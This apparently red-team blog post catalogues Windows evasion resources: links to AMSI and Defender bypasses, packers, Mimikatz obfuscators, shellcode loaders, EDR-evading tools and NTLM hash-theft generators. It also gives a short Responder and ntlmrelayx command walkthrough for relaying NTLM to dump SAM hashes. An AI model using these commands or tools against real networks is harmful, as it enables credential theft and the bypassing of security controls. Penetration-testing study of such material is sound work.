Home

Published

- 5 min read

Windows Evasion in 2025

img of Windows Evasion in 2025

Long overdue, a list we partly published already in our Notebook. Well yeah, title misleading - it’s things we’ve all done in Evasion but not yet all published. We held back with some stuff on purpose, to give Blue a headstart, before each and anything becomes public knowledge, and also we didn’t have time to do it properly yet. Most things should be in this pure-list-article, except for what the title image suggested.

More details to some techniques, revived evasions and explanations, you’ll find in the link above.

Defense Evasion, AMSI, UAC, …

Computers are made to execute code.
There’s hardly anything that can stop us entirely from executing our commands or code.
(they’re bad at telling who-is-who)

Technique X doesn’t work!

If it’s not a decade old, overused and patched 100 times, it may still have validity.

  • Learning aspect
  • Try and make it work again, find a new way
  • Systems are complex and unpredictable: we made an AD lab setup with 3 identical clients, there’s often one reacting differently, suddenly allowing things that the other two don’t

General Tools & Info

Loader

FilelessPELoader

MW Dev

AMSI Bypass

AMSI Killer

Bypassing Defender ATP

ASR

PPL Killer

DLL Injection

Rootkits

CLM bypass

C# Basics

Python C2 Server

C# Reverse Shell

LDAP Enumeration

Automating Active Directory Enumeration

avcleaner

https://blog.scrt.ch/2020/06/19/engineering-antivirus-evasion/
https://github.com/scrt/avcleaner

C/C++ source obfuscator for antivirus bypass

PEzor

https://github.com/phra/PEzor
https://iwantmore.pizza/posts/PEzor.html

Designing and Implementing PEzor, an Open-Source PE Packer

x0rro

https://iwantmore.pizza/posts/x0rro.html

A PE/ELF/MachO Crypter for x86 and x86_64 Based on Radare2

Obfuscating Mimikatz

https://sudonull.com/post/27330-Getting-around-Windows-Defender-cheaply-and-cheerfully-obfuscating-Mimikatz-THunter-Blog

HxD style binary patching

Mimikatz Obfuscator

https://gist.github.com/imaibou/92feba3455bf173f123fbe50bbe80781

Certifried combined with KrbRelayUp

https://gist.github.com/S3cur3Th1sSh1t/4c84557279ee23af89e40a9e41ee85d5

Non-privileged domain user to Domain Admin without adding/pre-owning computer accounts.

pypykatz

https://github.com/skelsec/pypykatz

Mimikatz implementation in pure Python.

Mimikatz

https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20220919

Building a custom Mimikatz binary

https://s3cur3th1ssh1t.github.io/Building-a-custom-Mimikatz-binary/ https://github.com/matterpreter/DefenderCheck
https://gist.github.com/S3cur3Th1sSh1t/ef2f2b296e26b18c361e40a3d1c2fda5 - S3cur3Th1sSh1t/mimikatz_obfuscator.sh
https://gist.github.com/S3cur3Th1sSh1t/08623de0c5cc67d36d4a235cec0f5333 - S3cur3Th1sSh1t/ObfuscateMimi_First.sh
https://gist.github.com/S3cur3Th1sSh1t/cb040a750f5984c41c8f979040ed112a - S3cur3Th1sSh1t/ObfuscateMimi_Seccond.sh
https://gist.github.com/S3cur3Th1sSh1t/18114a804a4819431107806319e91571 - S3cur3Th1sSh1t/kerberos_attacks_cheatsheet.md
https://s3cur3th1ssh1t.github.io/Bypass-AMSI-by-manual-modification-part-II/
https://gist.github.com/S3cur3Th1sSh1t/b33b978ea62a4b0f6ef545f1378512a6 - S3cur3Th1sSh1t/Invoke-CustomKatz.ps1

Responder

https://github.com/lgandx/Responder
https://www.virtuesecurity.com/kb/responder-multirelay-pentesting-cheatsheet/

Known-good version. Separate Windows-Host version available.

Inceptor

https://github.com/klezVirus/inceptor

Inceptor is a template-based PE packer for Windows, designed to help penetration testers and red teamers to bypass common AV and EDR solutions.

Customizing C2-Frameworks for AV-Evasion

https://s3cur3th1ssh1t.github.io/Customizing_C2_Frameworks/

Changing C2-Framework Powershell Empire source code for AV-Evasion.

amber

https://github.com/EgeBalci/amber
https://github.com/EgeBalci/amber/blob/8663119d9cfd818c86ed1a3a1988b5c1aa5e1453/handler.go

https://pentest.blog/introducing-new-packing-method-first-reflective-pe-packer/
First Reflective PE Packer Amber

donut

https://github.com/TheWover/donut?tab=readme-ov-file#usage

InflativeLoading

https://securityonline.info/inflativeloading-dynamically-convert-a-native-exe-to-pic-shellcode/

Dynamically convert a native EXE to PIC shellcode.

ProtectMyTooling

https://mgeeky.tech/protectmytooling/

Don’t detect tools, detect techniques.

avred

https://github.com/dobin/avred

Avred is being used to identify which parts of a file are identified by a Antivirus, and tries to show as much possible information and context about each match.

Peekaboo

https://github.com/cocomelonc/peekaboo

Simple undetectable shellcode and code injector launcher example. Inspired by RTO malware development course. XOR encryption and decryption for functions call and main payload - msfvenom reverse shell as example.

Freeze

https://github.com/optiv/Freeze?tab=readme-ov-file
https://www.optiv.com/insights/source-zero/blog/sacrificing-suspended-processes

Sacrificing Suspended Processes - Freeze is a payload creation tool used for circumventing EDR security controls to execute shellcode in a stealthy manner. Freeze utilizes multiple techniques to not only remove Userland EDR hooks, but to also execute shellcode in such a way that it circumvents other endpoint monitoring controls.

hacktricks

https://book.hacktricks.xyz/windows-hardening/av-bypass

CME

https://medium.com/r3d-buck3t/crackmapexec-in-action-enumerating-windows-networks-part-1-3a6a7e5644e9

ntlm_theft

https://github.com/Greenwolf/ntlm_theft

A tool for generating multiple types of NTLMv2 hash theft files. […] The benefits of these file types over say macro based documents or exploit documents are that all of these are built using “intended functionality”. None were flagged by Windows Defender Antivirus on June 2020, and 17 of the 21 attacks worked on a fully patched Windows 10 host.

ntlmrelayx

https://www.youtube.com/watch?v=C6Q5LVJ3KaQ

With responder and impacket

  • Will allow you to dump SAM
  • Attack must be performed against account / machine that is local admin and thus can dump SAM
  • On victim machine there must be an attempt to access non-existent SMB share, e.g. \asawerfs
  • Victim must be AD client. Server won’t work
bash
   $ nano responder.conf
HTTP = Off
SMB = Off

$ nmap --script=smb2-security-mode -p445 192.168.2.99

Must say: 2.02: Message signing enabled but not required
# by default it will say ...and required, which will prevent the attack
# needs to edit Group Policy to change this setting

# Responder will respond to non-existent SMB request and poison LLMNR
$ responder.py -I eth0 -rdw -v # some params may be different now

# Will dump SAM hashes
$ ntlmrelayx.py -tf /dev/shm/targetIP.txt -smb2support

UAC Bypass

fodhelper.exe - modified UAC bypass

Works partly or not at all

at least not unmodified.

Wscript Trigger

computerdefaults.exe

Vuln Drivers & Kernel Stuff

Privesc

Privesc Above LocalAdmin

From Administrator to further elevated, system accounts / privs

Persistence

Easy Office Macros Signed

Defender

We generally disadvice to run precompiled binaries or to open Visual Studio projects (both are instant code execution for an adversary) from unknown sources without thorough check or using a sandboxed test system.

no longer working on latest patch level

Maybe duplicates, just dropping here.